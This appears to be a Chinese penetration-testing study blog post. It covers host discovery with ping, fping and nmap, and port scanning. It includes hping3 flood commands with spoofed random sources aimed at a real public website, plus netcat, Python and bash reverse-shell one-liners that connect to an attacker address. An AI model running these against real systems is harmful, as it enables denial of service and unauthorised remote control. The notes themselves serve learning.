内网渗透笔记——三层发现and四层发现

原创 已于 2022-01-24 20:07:27 修改 · 4.1k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络 #linux

于 2022-01-21 15:00:17 首次发布
本文介绍网络探测的基本原理及方法,包括使用ping、fping等工具进行三层发现,运用hping3进行DDoS攻击模拟,以及通过nmap进行四层发现与端口扫描。此外还介绍了如何创建和维护反弹shell,以及使用nc工具进行文件传输。

三层发现(网络层)

最常用ping命令,但是如果防火墙一开,就无法ping到对方。三层发现的优点在于,arping只能发现同一个网段的用户,而三层发现可以发现不同网段但是互联的用户

fping

-a存活主机
-b数据包大小
-f从文件中读取ip(不能和-g同时使用)
-l循环ping
-g网段,开始-结束地址
-u不可达,ping不通

图一没有设置范围,图二设置了扫描的开始地址和结束地址,如果没有设置范围,就默认从头扫到尾。

2>/dev/null 是为了防止奇怪的输出

hping3

可以发动ddos攻击,主要用于ddos,但不好测试,一旦使用对自己和他人的网络都有威胁。

数据包要大,发的要快

-a:                  伪造源ip(隐藏自己)
-c:                  发包的数目
-p:                  端口
-d:                  发包大小
-i:                   发包间隔
-w:                 滑动窗口大小
--flood               尽快发送数据包,不回复
--rand-source    随机源地址(-a是指定一个伪造ip,这是随机)

--udp       udp攻击
--icmp      icmp攻击
-S            syn攻击
-A            ack攻击

hping3 --upd -c 1000000 -d 120 -p 80 -w 64 --flood --rand-source www.baidu.com
hping3 --icmp -c 1000000 -d 120 -p 80 -w 64 --flood --rand-source www.baidu.com
hping3 -S -c 1000000 -d 120 -p 80 -w 64 --flood --rand-source www.baidu.com

四层发现(传输层)

依靠TCP/UDP传输——可靠、TCP的三次握手——花费时间长

如果防火墙关闭icmp二层,三层命令直接gg,无法ping通,但是四层发现可以通过端口来检测

nmap

主机发现

 -sn:只探测存活(基于icmp,开防火墙无效)
-Pn:只探测端口(开防火墙有效)


-O :操作系统探测

端口探测
-sS:tcp syn扫描 扫端口(常用,最好用,速度快,隐蔽性好,第三次握手没实现)
-p :端口,(80,8080)——探测80和8080端口

                   (-p-)——探测全部的端口

                     (80-8080)——探测80到8080的端口

nmap默认扫描范围为1——1000

nmap -p -sS 80 192.168.111.131

nmap -p- -sS192.168.111.131

nmap -p 80-8080 -sS192.168.111.131
-sV:探测服务版本(很重要,可利用版本漏洞)
-A :综合扫描
-iL:指定文件扫描

--exclude:            排除ip
--excludefile:        指定文件列表
--script=vuln:       常见漏洞扫描

nmap的保存和输出

nmap -F -oN test.txt IP/24

 常见端口号

端口端口说明
21ftp
22ssh
23telnet
80http
443https
139samba
3306mysql
3389RDP远程桌面

NC(netcat)

 

shell——命令解释器 

反弹shell

让恶意程序主动连接我们

使用场景:蚁剑 → 服务器(反弹)kali监听 → 提权

-c | -e 执行指令
-v 详细信息, -vv 更详细
-l listen 监听
-n ip的形式指定连接地址,非域名
-p 指定端口
-q 结束延迟
-w 超时时间
-z 零输入输出,只扫端口 可以指定范围,例如80-8080

kali 输入ip:正向
win7 输入ip:反向

kali: nc -lvvp 4444 -e 
win7: nc kaliIp 4444 - e cmd

反向连接:

正向连接:

 

 传输文件:

Server:nc < fileName
Client:nc > fileName

 

 

端口探测:

 乱码解决:

 拿反向连接举例,会发现连接成功之后会有乱码出现

 出现乱码的原因其实是两个系统的编码不同

kali:     utf-8 一个字占3字节
win7: gbk  一个字占2字节

因此win7到kali,出现了乱码,解决方案——chcp命令

chcp 65001 utf-8
chcp 936 gbk

 一些反弹shell

 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 
bash -c 'exec bash -i &>/dev/tcp/10.0.0.3/4444 <&1'

王嘴嘴
关注
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
红队内网攻防渗透内网渗透内网各种工具平台的使用
HACKONE的博客
04-10 1765
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
kali信息主动收集之三层发现
hacker681的博客
12-27 564
三层发现 优点可路由 速度比较快 缺点 速度比二层慢 经常被边界防火墙过滤 是IP、icmp协议(网络控制管理,路径发现网络发现诊断的协议) ping命令 ping IP -c 指定包数 用这个命令发到指定的包数之后就会结束发包 当我们如果探测一个目标机器可以ping他 他会返回ICMP的数据包还有一个办法就是路由追踪的方式可以作到探测目标机器在线或者离线 还可以发现从我的机器到目标机器经过了多少...
信息搜集 - 三层发现 hping3
发哥微课堂
11-02 476
0x00:简介 hping 也是一个很强大的发包程序,最新版本是 3,hping 除了可以发送各种各样的数据包外,还可以做压力测试,造成一定程度的拒绝服务攻击。 0x01:hping3 hping3 在三层发现目标的基本用法和 ping 类似,也和 fping 类似,但不支持批量操作,也需要借用 shell 脚本来实现。各有优缺点。最基本的用法是后跟一个目标地址,然后指定发送包的类型,c 参...
信息搜集 - 三层发现 Nmap
发哥微课堂
11-01 742
0x00:简介 nmap 在之前二层发现目标主要是通过 sn 参数,而三层发现的参数也是 sn,namp 通过 sn 参数进行扫描目标,作用于哪层要根据扫描的范围来定。 当扫描的目标和自己在同一个网段的时候,sn 参数主要就是用的 arp 协议来扫描,当目标和自己不在同一个网段时,sn 参数主要就是用的 icmp 协议来扫描。所以二层发现用的 nmap 命令和三层发现用的 nmap 命令参数一...
三层发现
_LsOutLook
04-20 351
ping ping使用的是ICMP协议 ping -c 4 192.168.0.1 参数-c指定发送数据包的数量,-R列出途中经过的路由器IP traceroute 列出途中经过的路由器IP fping fping -c 4 192.168.0.1 fping优于ping的一点是ping不支持对一个IP地址段进行扫描的功能,而fping可以 fping -g 1...
3-2主机发现-三层发现
山兔的博客
06-29 428
三层主机发现指:利用OSI中网络中的协议进行主机发现。一般使用ICMP协议。优点:1、可以发现远程主机,经过路由的主机,弥补了我们二层发现不能发现不同子网的主机2、速度相对比较快缺点:1、经常被防火墙过滤,icmp经常被防火墙过滤2、速度相比二层发现慢ping工具在linux和windows都有自带,自带这些工具是有不同的,linux下ping如果不指定-c参数,一直扫描。windows下默认进行四次探测。 因为我们本机开了防火墙,我们关闭一下 我们在探测过程中,也会发现探测子网主机的存活性,使用第三层
【小迪安全2023】个人学习笔记——信息收集(WAF扫描,github推送监控,封包监听工具,端口扫描)
最新发布
发布一些个人学习笔记,分享一些可能在安全学习道路上遇到的问题、心得,一起学习一起进步
04-25 3152
主要是信息收集阶段的一些思路,推荐了一些常用的信息收集网站或者项目的地址,主要涉及了网站依照搭建习惯的分类,网站端口扫描,WAF防护分析,teemo子域名枚举脚本,网站证书查询等信息收集阶段方面的内容
Web安全攻防渗透测试实战指南笔记
Ren59421的博客
04-05 8951
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
kaliWEB渗透笔记
fhl5203的博客
11-01 5487
抓包协议分析 一般每300M分成一个包,这样抓包分析工具打开速度不会太慢。 首先剔除对分析没有用处的协议,剔除IP地址是224以上的组播地址。 WEB攻击面 Network、OS、WEB Server、App server、Web Application、Database、Browser 重要的header • Set-Cookie:服务器发给客户端的SessionlD (被窃取的风险) • Co...
内网渗透测试基础——分析域内网段划分情况及拓扑结构
Bruce_xiaowei的博客
12-21 1438
掌握了内网的相关信息后, 渗透测试人员可以分析目标网络的结构和安全防御策略,获取网段信息、各部门的IP地址段,并尝试绘制内网的拓扑结构图。当然,渗透测试人员无法了解内网的物理结构,只能从宏观上对内网建立一个整体认识
Kali学习笔记7:三层发现
weixin_30746117的博客
07-13 184
三层发现:发送ICMP/IP数据包探测 第一种方式: 就是很简单的Ping命令: 不过linux的ping命令和windows的ping命令不一样,它会默认不停止地发数据包 我们可以通过-c参数来设置 第二种方式: traceroute命令: 这里会显示所有路由跳过的IP,***说明被防火墙阻挡了(通常防火墙默认阻挡ICMP数据包)。 实现原理是基于TTL...
小白日记8:kali渗透测试之主动信息收集(二)三层发现:ping、traceroute、scapy、nmap、fping、Hping
ZiXuanFY的博客
09-10 6138
三层发现 三层协议有:IP以及ICMP协议(internet管理协议).icmp的作用是用来实现intenet管理的,进行路径的发现,网路通信情况,或者目标主机的状态;在三层发现中主要使用icmp协议,arp协议属于二层协议,它是基于广播的,所以不可路由。而ICMP协议是可以路由的,理论上可以使用icmp协议发现全球的ip,如果没有边界防火墙(禁止icmp的探测包)进行过滤的话,对目标主机进行扫
6. 主动信息收集-二三四层发现
Daylight
08-06 1761
主动信息收集 通过被动信息收集我们可以收集到一些目标的域名、服务器、ip、设备。但是这些收集到的信息大部分是通过搜索引擎、枚举等方式获取到的,搜索引擎搜索到的信息可能是过时了的信息,被动信息收集的结果可能使不准确的。 因此可以使用主动信息收集 对被动信息收集的结果进行验证确认,发现更多信息。 主动信息收集需要直接与目标系统交互通信,因此如果目标系统有完善的日志记录的话,是无法避免留下访问痕迹的,如果目标系统管理员有比较强的抓包分析,日志审计能力是可以发现我们在进行信息收集。 为了避免目标系统发现痕迹,避免把
网段扫描/主机发现-netdiscover/nmap/arp-scan
-
06-24 3000
网段扫描-netdiscover/nmap/arp-scan
记一次四层内网攻防渗透测试大实验
2301_76786857的博客
08-09 1086
先使用常见的 ICMP 协议查看目标,目标网站的IP为192.168.1.129ping 192.168.1.129 # 探测目标主机 然后直接对目标IP进行端口扫描:nmap -T4 -sC -sV -p 1-10000 192.168.1.129如上图,目标开启了22、80、81和6379端口。 对目标192.168.1.129进行目录爆破:python3 dirsearch.py -u "http://192.168.1.129" -e *拼接url:http://192.168.1.129/mana
Kali学习笔记8:四层发现
weixin_30448685的博客
07-14 157
1.基于TCP协议 优点: 1.可路由且结果可靠 2.不太可能会被防火墙过滤 3.甚至可以发现端口 缺点: 速度较慢(三次握手) 利用Scapy发送ACK数据包: 配置数据包: 发送数据包: 看一下收到数据包的结果: 这里收到Reset,只要ip存在,无论这个端口是否开放,都会返回Reset数据包。 我们抓包...
Kali Linux 渗透测试之主动收集(三层扫描)
weixin_43803070的博客
05-22 907
** 三层扫描: ** 工作协议:ip/icmp icpm叫Internet控制管理协议,他的作用是做路径的发现,主机网络通断情况的诊断。用此协议来探测反映目标主机的状态。 优点:可以跨路由器。速度比较快但是比二层慢,可以发现所有活着的主机,前提是目标主机接受所发送的协议,会根据所发的协议会返回一个响应数据包。 缺点:防火墙会过滤掉icmp协议。 二层、三层扫描都会被目标主机的过滤机制所过滤,以至...
信息搜集 - 四层发现 Nmap
发哥微课堂
11-08 738
0x00:简介 四层发现主要利用 tcp 和 udp,而除了 scapy 外,nmap 无疑也是一个很强大的工具。 0x01:nmap 四层发现 首先,来看一下主要用到的参数,如下图: 红框中的参数分别是 PS、PA、PU、PY,扫描类型代表是 syn、ack、udp、sctp。 nmap 在四层使用 udp 做发现命令格式是:namp 1.1.1.0/24 -PU22222 -sn...
内网渗透实战指南:发现与控制域环境风险
内网渗透讲义深入探讨了在信息技术领域中,特别是在Windows网络环境中,内网渗透的重要性和方法。内网,或称局域网(LAN),是一种在特定地理范围内,如办公室或企业内部,通过网络连接多台计算机的封闭型网络。它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值